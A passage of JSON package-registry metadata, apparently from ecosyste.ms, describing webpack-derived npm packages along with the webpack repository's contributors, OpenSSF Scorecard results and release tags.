count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-vscode-wasm/codemeta","maintainers":[{"uuid":"huacnlee","login":"huacnlee","name":null,"email":"huacnlee@gmail.com","url":null,"packages_count":29,"html_url":"https://www.npmjs.com/~huacnlee","role":null,"created_at":"2022-11-20T06:00:55.636Z","updated_at":"2022-11-20T06:00:55.636Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/huacnlee/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8294368,"name":"ssr-webpack4","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":3,"first_release_published_at":"2023-09-18T08:05:24.042Z","latest_release_published_at":"2023-09-18T09:12:21.691Z","latest_release_number":"4.46.2","last_synced_at":"2026-09-03T00:17:06.572Z","created_at":"2023-09-18T11:20:24.305Z","updated_at":"2026-09-03T00:17:06.573Z","registry_url":"https://www.npmjs.com/package/ssr-webpack4","install_command":"npm install ssr-webpack4","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"4.46.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: